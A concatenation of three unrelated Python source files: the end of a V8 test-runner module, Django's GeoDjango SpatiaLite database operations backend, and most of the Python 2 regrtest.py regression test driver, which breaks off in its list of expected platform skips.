def _merge_flags(self, flags):
"""Merges flags from a list of flags.
Flag values not starting with '-' are merged with the preceeding flag,
e.g. --foo 1 will become --foo=1. All other flags remain the same.
Returns: A generator of flags.
"""
if not flags:
return
# Iterate over flag pairs. ['-'] is a sentinel value for the last iteration.
for flag1, flag2 in itertools.izip(flags, flags[1:] + ['-']):
if not flag2.startswith('-'):
assert '=' not in flag1
yield flag1 + '=' + flag2
elif flag1.startswith('-'):
yield flag1
def _is_flag_blacklisted(self, flag):
for item in COMBINE_TESTS_FLAGS_BLACKLIST:
if isinstance(item, basestring):
if item == flag:
return True
elif item.match(flag):
return True
return False
def _get_combined_flags(self, flags_gen):
"""Combines all flags - dedupes, keeps order and filters some flags.
Args:
flags_gen: Generator for flag lists.
Returns: A list of flags.
"""
merged_flags = self._merge_flags(list(itertools.chain(*flags_gen)))
unique_flags = OrderedDict((flag, True) for flag in merged_flags).keys()
return [
flag for flag in unique_flags
if not self._is_flag_blacklisted(flag)
]
def _get_source_flags(self):
# Combine flags from all source files.
return self._get_combined_flags(
test._get_source_flags() for test in self._tests)
def _get_statusfile_flags(self):
# Combine flags from all status file entries.
return self._get_combined_flags(
test._get_statusfile_flags() for test in self._tests)
class SuppressedTestCase(TestCase):
"""The same as a standard mjsunit test case with all asserts as no-ops."""
def __init__(self, *args, **kwargs):
super(SuppressedTestCase, self).__init__(*args, **kwargs)
self._mjsunit_files.append(
os.path.join(self.suite.root, "mjsunit_suppressions.js"))
def _prepare_outcomes(self, *args, **kwargs):
super(SuppressedTestCase, self)._prepare_outcomes(*args, **kwargs)
# Skip tests expected to fail. We suppress all asserts anyways, but some
# tests are expected to fail with type errors or even dchecks, and we
# can't differentiate that.
if statusfile.FAIL in self._statusfile_outcomes:
self._statusfile_outcomes = [statusfile.SKIP]
def _get_extra_flags(self, *args, **kwargs):
return (
super(SuppressedTestCase, self)._get_extra_flags(*args, **kwargs) +
['--disable-abortjs']
)
def GetSuite(*args, **kwargs):
return TestSuite(*args, **kwargs)
| |
import re
from decimal import Decimal
from django.contrib.gis.db.backends.base import BaseSpatialOperations
from django.contrib.gis.db.backends.util import SpatialOperation, SpatialFunction
from django.contrib.gis.db.backends.spatialite.adapter import SpatiaLiteAdapter
from django.contrib.gis.geometry.backend import Geometry
from django.contrib.gis.measure import Distance
from django.core.exceptions import ImproperlyConfigured
from django.db.backends.sqlite3.base import DatabaseOperations
from django.db.utils import DatabaseError
from django.utils import six
class SpatiaLiteOperator(SpatialOperation):
"For SpatiaLite operators (e.g. `&&`, `~`)."
def __init__(self, operator):
super(SpatiaLiteOperator, self).__init__(operator=operator)
class SpatiaLiteFunction(SpatialFunction):
"For SpatiaLite function calls."
def __init__(self, function, **kwargs):
super(SpatiaLiteFunction, self).__init__(function, **kwargs)
class SpatiaLiteFunctionParam(SpatiaLiteFunction):
"For SpatiaLite functions that take another parameter."
sql_template = '%(function)s(%(geo_col)s, %(geometry)s, %%s)'
class SpatiaLiteDistance(SpatiaLiteFunction):
"For SpatiaLite distance operations."
dist_func = 'Distance'
sql_template = '%(function)s(%(geo_col)s, %(geometry)s) %(operator)s %%s'
def __init__(self, operator):
super(SpatiaLiteDistance, self).__init__(self.dist_func,
operator=operator)
class SpatiaLiteRelate(SpatiaLiteFunctionParam):
"For SpatiaLite Relate(<geom>, <pattern>) calls."
pattern_regex = re.compile(r'^[012TF\*]{9}$')
def __init__(self, pattern):
if not self.pattern_regex.match(pattern):
raise ValueError('Invalid intersection matrix pattern "%s".' % pattern)
super(SpatiaLiteRelate, self).__init__('Relate')
# Valid distance types and substitutions
dtypes = (Decimal, Distance, float) + six.integer_types
def get_dist_ops(operator):
"Returns operations for regular distances; spherical distances are not currently supported."
return (SpatiaLiteDistance(operator),)
class SpatiaLiteOperations(DatabaseOperations, BaseSpatialOperations):
compiler_module = 'django.contrib.gis.db.models.sql.compiler'
name = 'spatialite'
spatialite = True
version_regex = re.compile(r'^(?P<major>\d)\.(?P<minor1>\d)\.(?P<minor2>\d+)')
valid_aggregates = dict([(k, None) for k in ('Extent', 'Union')])
Adapter = SpatiaLiteAdapter
Adaptor = Adapter # Backwards-compatibility alias.
area = 'Area'
centroid = 'Centroid'
contained = 'MbrWithin'
difference = 'Difference'
distance = 'Distance'
envelope = 'Envelope'
intersection = 'Intersection'
length = 'GLength' # OpenGis defines Length, but this conflicts with an SQLite reserved keyword
num_geom = 'NumGeometries'
num_points = 'NumPoints'
point_on_surface = 'PointOnSurface'
scale = 'ScaleCoords'
svg = 'AsSVG'
sym_difference = 'SymDifference'
transform = 'Transform'
translate = 'ShiftCoords'
union = 'GUnion' # OpenGis defines Union, but this conflicts with an SQLite reserved keyword
unionagg = 'GUnion'
from_text = 'GeomFromText'
from_wkb = 'GeomFromWKB'
select = 'AsText(%s)'
geometry_functions = {
'equals' : SpatiaLiteFunction('Equals'),
'disjoint' : SpatiaLiteFunction('Disjoint'),
'touches' : SpatiaLiteFunction('Touches'),
'crosses' : SpatiaLiteFunction('Crosses'),
'within' : SpatiaLiteFunction('Within'),
'overlaps' : SpatiaLiteFunction('Overlaps'),
'contains' : SpatiaLiteFunction('Contains'),
'intersects' : SpatiaLiteFunction('Intersects'),
'relate' : (SpatiaLiteRelate, six.string_types),
# Returns true if B's bounding box completely contains A's bounding box.
'contained' : SpatiaLiteFunction('MbrWithin'),
# Returns true if A's bounding box completely contains B's bounding box.
'bbcontains' : SpatiaLiteFunction('MbrContains'),
# Returns true if A's bounding box overlaps B's bounding box.
'bboverlaps' : SpatiaLiteFunction('MbrOverlaps'),
# These are implemented here as synonyms for Equals
'same_as' : SpatiaLiteFunction('Equals'),
'exact' : SpatiaLiteFunction('Equals'),
}
distance_functions = {
'distance_gt' : (get_dist_ops('>'), dtypes),
'distance_gte' : (get_dist_ops('>='), dtypes),
'distance_lt' : (get_dist_ops('<'), dtypes),
'distance_lte' : (get_dist_ops('<='), dtypes),
}
geometry_functions.update(distance_functions)
def __init__(self, connection):
super(DatabaseOperations, self).__init__(connection)
# Creating the GIS terms dictionary.
gis_terms = ['isnull']
gis_terms += self.geometry_functions.keys()
self.gis_terms = dict([(term, None) for term in gis_terms])
def confirm_spatial_components_versions(self):
# Determine the version of the SpatiaLite library.
try:
vtup = self.spatialite_version_tuple()
version = vtup[1:]
if version < (2, 3, 0):
raise ImproperlyConfigured('GeoDjango only supports SpatiaLite versions '
'2.3.0 and above')
self.spatial_version = version
except ImproperlyConfigured:
raise
except Exception as msg:
raise ImproperlyConfigured('Cannot determine the SpatiaLite version for the "%s" '
'database (error was "%s"). Was the SpatiaLite initialization '
'SQL loaded on this database?' %
(self.connection.settings_dict['NAME'], msg))
if version >= (2, 4, 0):
# Spatialite 2.4.0-RC4 added AsGML and AsKML, however both
# RC2 (shipped in popular Debian/Ubuntu packages) and RC4
# report version as '2.4.0', so we fall back to feature detection
try:
self._get_spatialite_func("AsGML(GeomFromText('POINT(1 1)'))")
self.gml = 'AsGML'
self.kml = 'AsKML'
except DatabaseError:
# we are using < 2.4.0-RC4
pass
if version >= (3, 0, 0):
self.geojson = 'AsGeoJSON'
def check_aggregate_support(self, aggregate):
"""
Checks if the given aggregate name is supported (that is, if it's
in `self.valid_aggregates`).
"""
agg_name = aggregate.__class__.__name__
return agg_name in self.valid_aggregates
def convert_geom(self, wkt, geo_field):
"""
Converts geometry WKT returned from a SpatiaLite aggregate.
"""
if wkt:
return Geometry(wkt, geo_field.srid)
else:
return None
def geo_db_type(self, f):
"""
Returns None because geometry columnas are added via the
`AddGeometryColumn` stored procedure on SpatiaLite.
"""
return None
def get_distance(self, f, value, lookup_type):
"""
Returns the distance parameters for the given geometry field,
lookup value, and lookup type. SpatiaLite only supports regular
cartesian-based queries (no spheroid/sphere calculations for point
geometries like PostGIS).
"""
if not value:
return []
value = value[0]
if isinstance(value, Distance):
if f.geodetic(self.connection):
raise ValueError('SpatiaLite does not support distance queries on '
'geometry fields with a geodetic coordinate system. '
'Distance objects; use a numeric value of your '
'distance in degrees instead.')
else:
dist_param = getattr(value, Distance.unit_attname(f.units_name(self.connection)))
else:
dist_param = value
return [dist_param]
def get_geom_placeholder(self, f, value):
"""
Provides a proper substitution value for Geometries that are not in the
SRID of the field. Specifically, this routine will substitute in the
Transform() and GeomFromText() function call(s).
"""
def transform_value(value, srid):
return not (value is None or value.srid == srid)
if hasattr(value, 'expression'):
if transform_value(value, f.srid):
placeholder = '%s(%%s, %s)' % (self.transform, f.srid)
else:
placeholder = '%s'
# No geometry value used for F expression, substitue in
# the column name instead.
return placeholder % self.get_expression_column(value)
else:
if transform_value(value, f.srid):
# Adding Transform() to the SQL placeholder.
return '%s(%s(%%s,%s), %s)' % (self.transform, self.from_text, value.srid, f.srid)
else:
return '%s(%%s,%s)' % (self.from_text, f.srid)
def _get_spatialite_func(self, func):
"""
Helper routine for calling SpatiaLite functions and returning
their result.
"""
cursor = self.connection._cursor()
try:
try:
cursor.execute('SELECT %s' % func)
row = cursor.fetchone()
except:
# Responsibility of caller to perform error handling.
raise
finally:
cursor.close()
return row[0]
def geos_version(self):
"Returns the version of GEOS used by SpatiaLite as a string."
return self._get_spatialite_func('geos_version()')
def proj4_version(self):
"Returns the version of the PROJ.4 library used by SpatiaLite."
return self._get_spatialite_func('proj4_version()')
def spatialite_version(self):
"Returns the SpatiaLite library version as a string."
return self._get_spatialite_func('spatialite_version()')
def spatialite_version_tuple(self):
"""
Returns the SpatiaLite version as a tuple (version string, major,
minor, subminor).
"""
# Getting the SpatiaLite version.
try:
version = self.spatialite_version()
except DatabaseError:
# The `spatialite_version` function first appeared in version 2.3.1
# of SpatiaLite, so doing a fallback test for 2.3.0 (which is
# used by popular Debian/Ubuntu packages).
version = None
try:
tmp = self._get_spatialite_func("X(GeomFromText('POINT(1 1)'))")
if tmp == 1.0: version = '2.3.0'
except DatabaseError:
pass
# If no version string defined, then just re-raise the original
# exception.
if version is None: raise
m = self.version_regex.match(version)
if m:
major = int(m.group('major'))
minor1 = int(m.group('minor1'))
minor2 = int(m.group('minor2'))
else:
raise Exception('Could not parse SpatiaLite version string: %s' % version)
return (version, major, minor1, minor2)
def spatial_aggregate_sql(self, agg):
"""
Returns the spatial aggregate SQL template and function for the
given Aggregate instance.
"""
agg_name = agg.__class__.__name__
if not self.check_aggregate_support(agg):
raise NotImplementedError('%s spatial aggregate is not implmented for this backend.' % agg_name)
agg_name = agg_name.lower()
if agg_name == 'union': agg_name += 'agg'
sql_template = self.select % '%(function)s(%(field)s)'
sql_function = getattr(self, agg_name)
return sql_template, sql_function
def spatial_lookup_sql(self, lvalue, lookup_type, value, field, qn):
"""
Returns the SpatiaLite-specific SQL for the given lookup value
[a tuple of (alias, column, db_type)], lookup type, lookup
value, the model field, and the quoting function.
"""
alias, col, db_type = lvalue
# Getting the quoted field as `geo_col`.
geo_col = '%s.%s' % (qn(alias), qn(col))
if lookup_type in self.geometry_functions:
# See if a SpatiaLite geometry function matches the lookup type.
tmp = self.geometry_functions[lookup_type]
# Lookup types that are tuples take tuple arguments, e.g., 'relate' and
# distance lookups.
if isinstance(tmp, tuple):
# First element of tuple is the SpatiaLiteOperation instance, and the
# second element is either the type or a tuple of acceptable types
# that may passed in as further parameters for the lookup type.
op, arg_type = tmp
# Ensuring that a tuple _value_ was passed in from the user
if not isinstance(value, (tuple, list)):
raise ValueError('Tuple required for `%s` lookup type.' % lookup_type)
# Geometry is first element of lookup tuple.
geom = value[0]
# Number of valid tuple parameters depends on the lookup type.
if len(value) != 2:
raise ValueError('Incorrect number of parameters given for `%s` lookup type.' % lookup_type)
# Ensuring the argument type matches what we expect.
if not isinstance(value[1], arg_type):
raise ValueError('Argument type should be %s, got %s instead.' % (arg_type, type(value[1])))
# For lookup type `relate`, the op instance is not yet created (has
# to be instantiated here to check the pattern parameter).
if lookup_type == 'relate':
op = op(value[1])
elif lookup_type in self.distance_functions:
op = op[0]
else:
op = tmp
geom = value
# Calling the `as_sql` function on the operation instance.
return op.as_sql(geo_col, self.get_geom_placeholder(field, geom))
elif lookup_type == 'isnull':
# Handling 'isnull' lookup type
return "%s IS %sNULL" % (geo_col, (not value and 'NOT ' or ''))
raise TypeError("Got invalid lookup_type: %s" % repr(lookup_type))
# Routines for getting the OGC-compliant models.
def geometry_columns(self):
from django.contrib.gis.db.backends.spatialite.models import GeometryColumns
return GeometryColumns
def spatial_ref_sys(self):
from django.contrib.gis.db.backends.spatialite.models import SpatialRefSys
return SpatialRefSys
| |
#! /usr/bin/env python
"""Regression test.
This will find all modules whose name is "test_*" in the test
directory, and run them. Various command line options provide
additional facilities.
Command line options:
-v: verbose -- run tests in verbose mode with output to stdout
-q: quiet -- don't print anything except if a test fails
-g: generate -- write the output file for a test instead of comparing it
-x: exclude -- arguments are tests to *exclude*
-s: single -- run only a single test (see below)
-r: random -- randomize test execution order
-f: fromfile -- read names of tests to run from a file (see below)
-l: findleaks -- if GC is available detect tests that leak memory
-u: use -- specify which special resource intensive tests to run
-h: help -- print this text and exit
-t: threshold -- call gc.set_threshold(N)
-T: coverage -- turn on code coverage using the trace module
-D: coverdir -- Directory where coverage files are put
-N: nocoverdir -- Put coverage files alongside modules
-L: runleaks -- run the leaks(1) command just before exit
-R: huntrleaks -- search for reference leaks (needs debug build, v. slow)
If non-option arguments are present, they are names for tests to run,
unless -x is given, in which case they are names for tests not to run.
If no test names are given, all tests are run.
-v is incompatible with -g and does not compare test output files.
-T turns on code coverage tracing with the trace module.
-D specifies the directory where coverage files are put.
-N Put coverage files alongside modules.
-s means to run only a single test and exit. This is useful when
doing memory analysis on the Python interpreter (which tend to consume
too many resources to run the full regression test non-stop). The
file /tmp/pynexttest is read to find the next test to run. If this
file is missing, the first test_*.py file in testdir or on the command
line is used. (actually tempfile.gettempdir() is used instead of
/tmp).
-f reads the names of tests from the file given as f's argument, one
or more test names per line. Whitespace is ignored. Blank lines and
lines beginning with '#' are ignored. This is especially useful for
whittling down failures involving interactions among tests.
-L causes the leaks(1) command to be run just before exit if it exists.
leaks(1) is available on Mac OS X and presumably on some other
FreeBSD-derived systems.
-R runs each test several times and examines sys.gettotalrefcount() to
see if the test appears to be leaking references. The argument should
be of the form stab:run:fname where 'stab' is the number of times the
test is run to let gettotalrefcount settle down, 'run' is the number
of times further it is run and 'fname' is the name of the file the
reports are written to. These parameters all have defaults (5, 4 and
"reflog.txt" respectively), so the minimal invocation is '-R ::'.
-u is used to specify which special resource intensive tests to run,
such as those requiring large file support or network connectivity.
The argument is a comma-separated list of words indicating the
resources to test. Currently only the following are defined:
all - Enable all special resources.
audio - Tests that use the audio device. (There are known
cases of broken audio drivers that can crash Python or
even the Linux kernel.)
curses - Tests that use curses and will modify the terminal's
state and output modes.
largefile - It is okay to run some test that may create huge
files. These tests can take a long time and may
consume >2GB of disk space temporarily.
network - It is okay to run tests that use external network
resource, e.g. testing SSL support for sockets.
bsddb - It is okay to run the bsddb testsuite, which takes
a long time to complete.
decimal - Test the decimal module against a large suite that
verifies compliance with standards.
compiler - Test the compiler package by compiling all the source
in the standard library and test suite. This takes
a long time.
To enable all resources except one, use '-uall,-<resource>'. For
example, to run all the tests except for the bsddb tests, give the
option '-uall,-bsddb'.
"""
import os
import sys
import getopt
import random
import warnings
import sre
import cStringIO
import traceback
# I see no other way to suppress these warnings;
# putting them in test_grammar.py has no effect:
warnings.filterwarnings("ignore", "hex/oct constants", FutureWarning,
".*test.test_grammar$")
if sys.maxint > 0x7fffffff:
# Also suppress them in <string>, because for 64-bit platforms,
# that's where test_grammar.py hides them.
warnings.filterwarnings("ignore", "hex/oct constants", FutureWarning,
"<string>")
# MacOSX (a.k.a. Darwin) has a default stack size that is too small
# for deeply recursive regular expressions. We see this as crashes in
# the Python test suite when running test_re.py and test_sre.py. The
# fix is to set the stack limit to 2048.
# This approach may also be useful for other Unixy platforms that
# suffer from small default stack limits.
if sys.platform == 'darwin':
try:
import resource
except ImportError:
pass
else:
soft, hard = resource.getrlimit(resource.RLIMIT_STACK)
newsoft = min(hard, max(soft, 1024*2048))
resource.setrlimit(resource.RLIMIT_STACK, (newsoft, hard))
from test import test_support
RESOURCE_NAMES = ('audio', 'curses', 'largefile', 'network', 'bsddb',
'decimal', 'compiler')
def usage(code, msg=''):
print __doc__
if msg: print msg
sys.exit(code)
def main(tests=None, testdir=None, verbose=0, quiet=False, generate=False,
exclude=False, single=False, randomize=False, fromfile=None,
findleaks=False, use_resources=None, trace=False, coverdir='coverage',
runleaks=False, huntrleaks=False):
"""Execute a test suite.
This also parses command-line options and modifies its behavior
accordingly.
tests -- a list of strings containing test names (optional)
testdir -- the directory in which to look for tests (optional)
Users other than the Python test suite will certainly want to
specify testdir; if it's omitted, the directory containing the
Python test suite is searched for.
If the tests argument is omitted, the tests listed on the
command-line will be used. If that's empty, too, then all *.py
files beginning with test_ will be used.
The other default arguments (verbose, quiet, generate, exclude, single,
randomize, findleaks, use_resources, trace and coverdir) allow programmers
calling main() directly to set the values that would normally be set by
flags on the command line.
"""
test_support.record_original_stdout(sys.stdout)
try:
opts, args = getopt.getopt(sys.argv[1:], 'hvgqxsrf:lu:t:TD:NLR:',
['help', 'verbose', 'quiet', 'generate',
'exclude', 'single', 'random', 'fromfile',
'findleaks', 'use=', 'threshold=', 'trace',
'coverdir=', 'nocoverdir', 'runleaks',
'huntrleaks='
])
except getopt.error, msg:
usage(2, msg)
# Defaults
if use_resources is None:
use_resources = []
for o, a in opts:
if o in ('-h', '--help'):
usage(0)
elif o in ('-v', '--verbose'):
verbose += 1
elif o in ('-q', '--quiet'):
quiet = True;
verbose = 0
elif o in ('-g', '--generate'):
generate = True
elif o in ('-x', '--exclude'):
exclude = True
elif o in ('-s', '--single'):
single = True
elif o in ('-r', '--randomize'):
randomize = True
elif o in ('-f', '--fromfile'):
fromfile = a
elif o in ('-l', '--findleaks'):
findleaks = True
elif o in ('-L', '--runleaks'):
runleaks = True
elif o in ('-t', '--threshold'):
import gc
gc.set_threshold(int(a))
elif o in ('-T', '--coverage'):
trace = True
elif o in ('-D', '--coverdir'):
coverdir = os.path.join(os.getcwd(), a)
elif o in ('-N', '--nocoverdir'):
coverdir = None
elif o in ('-R', '--huntrleaks'):
huntrleaks = a.split(':')
if len(huntrleaks) != 3:
print a, huntrleaks
usage(2, '-R takes three colon-separated arguments')
if len(huntrleaks[0]) == 0:
huntrleaks[0] = 5
else:
huntrleaks[0] = int(huntrleaks[0])
if len(huntrleaks[1]) == 0:
huntrleaks[1] = 4
else:
huntrleaks[1] = int(huntrleaks[1])
if len(huntrleaks[2]) == 0:
huntrleaks[2] = "reflog.txt"
elif o in ('-u', '--use'):
u = [x.lower() for x in a.split(',')]
for r in u:
if r == 'all':
use_resources[:] = RESOURCE_NAMES
continue
remove = False
if r[0] == '-':
remove = True
r = r[1:]
if r not in RESOURCE_NAMES:
usage(1, 'Invalid -u/--use option: ' + a)
if remove:
if r in use_resources:
use_resources.remove(r)
elif r not in use_resources:
use_resources.append(r)
if generate and verbose:
usage(2, "-g and -v don't go together!")
if single and fromfile:
usage(2, "-s and -f don't go together!")
good = []
bad = []
skipped = []
resource_denieds = []
if findleaks:
try:
import gc
except ImportError:
print 'No GC available, disabling findleaks.'
findleaks = False
else:
# Uncomment the line below to report garbage that is not
# freeable by reference counting alone. By default only
# garbage that is not collectable by the GC is reported.
#gc.set_debug(gc.DEBUG_SAVEALL)
found_garbage = []
if single:
from tempfile import gettempdir
filename = os.path.join(gettempdir(), 'pynexttest')
try:
fp = open(filename, 'r')
next = fp.read().strip()
tests = [next]
fp.close()
except IOError:
pass
if fromfile:
tests = []
fp = open(fromfile)
for line in fp:
guts = line.split() # assuming no test has whitespace in its name
if guts and not guts[0].startswith('#'):
tests.extend(guts)
fp.close()
# Strip .py extensions.
if args:
args = map(removepy, args)
if tests:
tests = map(removepy, tests)
stdtests = STDTESTS[:]
nottests = NOTTESTS[:]
if exclude:
for arg in args:
if arg in stdtests:
stdtests.remove(arg)
nottests[:0] = args
args = []
tests = tests or args or findtests(testdir, stdtests, nottests)
if single:
tests = tests[:1]
if randomize:
random.shuffle(tests)
if trace:
import trace
tracer = trace.Trace(ignoredirs=[sys.prefix, sys.exec_prefix],
trace=False, count=True)
test_support.verbose = verbose # Tell tests to be moderately quiet
test_support.use_resources = use_resources
save_modules = sys.modules.keys()
for test in tests:
if not quiet:
print test
sys.stdout.flush()
if trace:
# If we're tracing code coverage, then we don't exit with status
# if on a false return value from main.
tracer.runctx('runtest(test, generate, verbose, quiet, testdir)',
globals=globals(), locals=vars())
else:
ok = runtest(test, generate, verbose, quiet, testdir, huntrleaks)
if ok > 0:
good.append(test)
elif ok == 0:
bad.append(test)
else:
skipped.append(test)
if ok == -2:
resource_denieds.append(test)
if findleaks:
gc.collect()
if gc.garbage:
print "Warning: test created", len(gc.garbage),
print "uncollectable object(s)."
# move the uncollectable objects somewhere so we don't see
# them again
found_garbage.extend(gc.garbage)
del gc.garbage[:]
# Unload the newly imported modules (best effort finalization)
for module in sys.modules.keys():
if module not in save_modules and module.startswith("test."):
test_support.unload(module)
# The lists won't be sorted if running with -r
good.sort()
bad.sort()
skipped.sort()
if good and not quiet:
if not bad and not skipped and len(good) > 1:
print "All",
print count(len(good), "test"), "OK."
if verbose:
print "CAUTION: stdout isn't compared in verbose mode:"
print "a test that passes in verbose mode may fail without it."
if bad:
print count(len(bad), "test"), "failed:"
printlist(bad)
if skipped and not quiet:
print count(len(skipped), "test"), "skipped:"
printlist(skipped)
e = _ExpectedSkips()
plat = sys.platform
if e.isvalid():
surprise = set(skipped) - e.getexpected() - set(resource_denieds)
if surprise:
print count(len(surprise), "skip"), \
"unexpected on", plat + ":"
printlist(surprise)
else:
print "Those skips are all expected on", plat + "."
else:
print "Ask someone to teach regrtest.py about which tests are"
print "expected to get skipped on", plat + "."
if single:
alltests = findtests(testdir, stdtests, nottests)
for i in range(len(alltests)):
if tests[0] == alltests[i]:
if i == len(alltests) - 1:
os.unlink(filename)
else:
fp = open(filename, 'w')
fp.write(alltests[i+1] + '\n')
fp.close()
break
else:
os.unlink(filename)
if trace:
r = tracer.results()
r.write_results(show_missing=True, summary=True, coverdir=coverdir)
if runleaks:
os.system("leaks %d" % os.getpid())
sys.exit(len(bad) > 0)
STDTESTS = [
'test_grammar',
'test_opcodes',
'test_operations',
'test_builtin',
'test_exceptions',
'test_types',
]
NOTTESTS = [
'test_support',
'test_future1',
'test_future2',
'test_future3',
]
def findtests(testdir=None, stdtests=STDTESTS, nottests=NOTTESTS):
"""Return a list of all applicable test modules."""
if not testdir: testdir = findtestdir()
names = os.listdir(testdir)
tests = []
for name in names:
if name[:5] == "test_" and name[-3:] == os.extsep+"py":
modname = name[:-3]
if modname not in stdtests and modname not in nottests:
tests.append(modname)
tests.sort()
return stdtests + tests
def runtest(test, generate, verbose, quiet, testdir=None, huntrleaks=False):
"""Run a single test.
test -- the name of the test
generate -- if true, generate output, instead of running the test
and comparing it to a previously created output file
verbose -- if true, print more messages
quiet -- if true, don't print 'skipped' messages (probably redundant)
testdir -- test directory
"""
test_support.unload(test)
if not testdir:
testdir = findtestdir()
outputdir = os.path.join(testdir, "output")
outputfile = os.path.join(outputdir, test)
if verbose:
cfp = None
else:
cfp = cStringIO.StringIO()
if huntrleaks:
refrep = open(huntrleaks[2], "a")
try:
save_stdout = sys.stdout
try:
if cfp:
sys.stdout = cfp
print test # Output file starts with test name
if test.startswith('test.'):
abstest = test
else:
# Always import it from the test package
abstest = 'test.' + test
the_package = __import__(abstest, globals(), locals(), [])
the_module = getattr(the_package, test)
# Most tests run to completion simply as a side-effect of
# being imported. For the benefit of tests that can't run
# that way (like test_threaded_import), explicitly invoke
# their test_main() function (if it exists).
indirect_test = getattr(the_module, "test_main", None)
if indirect_test is not None:
indirect_test()
if huntrleaks:
# This code *is* hackish and inelegant, yes.
# But it seems to do the job.
import copy_reg
fs = warnings.filters[:]
ps = copy_reg.dispatch_table.copy()
pic = sys.path_importer_cache.copy()
import gc
def cleanup():
import _strptime, urlparse, warnings, dircache
from distutils.dir_util import _path_created
_path_created.clear()
warnings.filters[:] = fs
gc.collect()
sre.purge()
_strptime._regex_cache.clear()
urlparse.clear_cache()
copy_reg.dispatch_table.clear()
copy_reg.dispatch_table.update(ps)
sys.path_importer_cache.clear()
sys.path_importer_cache.update(pic)
dircache.reset()
if indirect_test:
def run_the_test():
indirect_test()
else:
def run_the_test():
reload(the_module)
deltas = []
repcount = huntrleaks[0] + huntrleaks[1]
print >> sys.stderr, "beginning", repcount, "repetitions"
print >> sys.stderr, \
("1234567890"*(repcount//10 + 1))[:repcount]
for i in range(repcount):
rc = sys.gettotalrefcount()
run_the_test()
sys.stderr.write('.')
cleanup()
deltas.append(sys.gettotalrefcount() - rc - 2)
print >>sys.stderr
if max(map(abs, deltas[-huntrleaks[1]:])) > 0:
print >>sys.stderr, test, 'leaked', \
deltas[-huntrleaks[1]:], 'references'
print >>refrep, test, 'leaked', \
deltas[-huntrleaks[1]:], 'references'
# The end of the huntrleaks hackishness.
finally:
sys.stdout = save_stdout
except test_support.ResourceDenied, msg:
if not quiet:
print test, "skipped --", msg
sys.stdout.flush()
return -2
except (ImportError, test_support.TestSkipped), msg:
if not quiet:
print test, "skipped --", msg
sys.stdout.flush()
return -1
except KeyboardInterrupt:
raise
except test_support.TestFailed, msg:
print "test", test, "failed --", msg
sys.stdout.flush()
return 0
except:
type, value = sys.exc_info()[:2]
print "test", test, "crashed --", str(type) + ":", value
sys.stdout.flush()
if verbose:
traceback.print_exc(file=sys.stdout)
sys.stdout.flush()
return 0
else:
if not cfp:
return 1
output = cfp.getvalue()
if generate:
if output == test + "\n":
if os.path.exists(outputfile):
# Write it since it already exists (and the contents
# may have changed), but let the user know it isn't
# needed:
print "output file", outputfile, \
"is no longer needed; consider removing it"
else:
# We don't need it, so don't create it.
return 1
fp = open(outputfile, "w")
fp.write(output)
fp.close()
return 1
if os.path.exists(outputfile):
fp = open(outputfile, "r")
expected = fp.read()
fp.close()
else:
expected = test + "\n"
if output == expected or huntrleaks:
return 1
print "test", test, "produced unexpected output:"
sys.stdout.flush()
reportdiff(expected, output)
sys.stdout.flush()
return 0
def reportdiff(expected, output):
import difflib
print "*" * 70
a = expected.splitlines(1)
b = output.splitlines(1)
sm = difflib.SequenceMatcher(a=a, b=b)
tuples = sm.get_opcodes()
def pair(x0, x1):
# x0:x1 are 0-based slice indices; convert to 1-based line indices.
x0 += 1
if x0 >= x1:
return "line " + str(x0)
else:
return "lines %d-%d" % (x0, x1)
for op, a0, a1, b0, b1 in tuples:
if op == 'equal':
pass
elif op == 'delete':
print "***", pair(a0, a1), "of expected output missing:"
for line in a[a0:a1]:
print "-", line,
elif op == 'replace':
print "*** mismatch between", pair(a0, a1), "of expected", \
"output and", pair(b0, b1), "of actual output:"
for line in difflib.ndiff(a[a0:a1], b[b0:b1]):
print line,
elif op == 'insert':
print "***", pair(b0, b1), "of actual output doesn't appear", \
"in expected output after line", str(a1)+":"
for line in b[b0:b1]:
print "+", line,
else:
print "get_opcodes() returned bad tuple?!?!", (op, a0, a1, b0, b1)
print "*" * 70
def findtestdir():
if __name__ == '__main__':
file = sys.argv[0]
else:
file = __file__
testdir = os.path.dirname(file) or os.curdir
return testdir
def removepy(name):
if name.endswith(os.extsep + "py"):
name = name[:-3]
return name
def count(n, word):
if n == 1:
return "%d %s" % (n, word)
else:
return "%d %ss" % (n, word)
def printlist(x, width=70, indent=4):
"""Print the elements of iterable x to stdout.
Optional arg width (default 70) is the maximum line length.
Optional arg indent (default 4) is the number of blanks with which to
begin each line.
"""
from textwrap import fill
blanks = ' ' * indent
print fill(' '.join(map(str, x)), width,
initial_indent=blanks, subsequent_indent=blanks)
# Map sys.platform to a string containing the basenames of tests
# expected to be skipped on that platform.
#
# Special cases:
# test_pep277
# The _ExpectedSkips constructor adds this to the set of expected
# skips if not os.path.supports_unicode_filenames.
# test_normalization
# Whether a skip is expected here depends on whether a large test
# input file has been downloaded. test_normalization.skip_expected
# controls that.
# test_socket_ssl
# Controlled by test_socket_ssl.skip_expected. Requires the network
# resource, and a socket module with ssl support.
# test_timeout
# Controlled by test_timeout.skip_expected. Requires the network
# resource and a socket module.
# test_codecmaps_*
# Whether a skip is expected here depends on whether a large test
# input file has been downloaded. test_codecmaps_*.skip_expected
# controls that.
_expectations = {
'win32':
"""
test__locale
test_applesingle
test_al
test_bsddb185
test_bsddb3
test_cd
test_cl
test_commands
test_crypt
test_curses
test_dbm
test_dl
test_fcntl
test_fork1
test_gdbm
test_gl
test_grp
test_imgfile
test_ioctl
test_largefile
test_linuxaudiodev
test_mhlib
test_nis
test_openpty
test_ossaudiodev
test_poll
test_posix
test_pty
test_pwd
test_resource
test_signal
test_sunaudiodev
test_threadsignals
test_timing
""",
'linux2':
"""
test_al
test_applesingle
test_bsddb185
test_cd
test_cl
test_curses
test_dl
test_gl
test_imgfile
test_largefile
test_linuxaudiodev
test_nis
test_ntpath
test_ossaudiodev
test_sunaudiodev
""",
'mac':
"""
test_al
test_atexit
test_bsddb
test_bsddb185
test_bsddb3
test_bz2
test_cd
test_cl
test_commands
test_crypt
test_curses
test_dbm
test_dl
test_fcntl
test_fork1
test_gl
test_grp
test_ioctl
test_imgfile
test_largefile
test_linuxaudiodev
test_locale
test_mmap
test_nis
test_ntpath
test_openpty
test_ossaudiodev
test_poll
test_popen
test_popen2
test_posix
test_pty
test_pwd
test_resource
test_signal
test_sunaudiodev
test_sundry
test_tarfile
test_timing
""",
'unixware7':
"""
test_al
test_applesingle
test_bsddb
test_bsddb185
test_cd
test_cl
test_dl
test_gl
test_imgfile
test_largefile
test_linuxaudiodev
test_minidom
test_nis
test_ntpath
test_openpty
test_pyexpat
test_sax
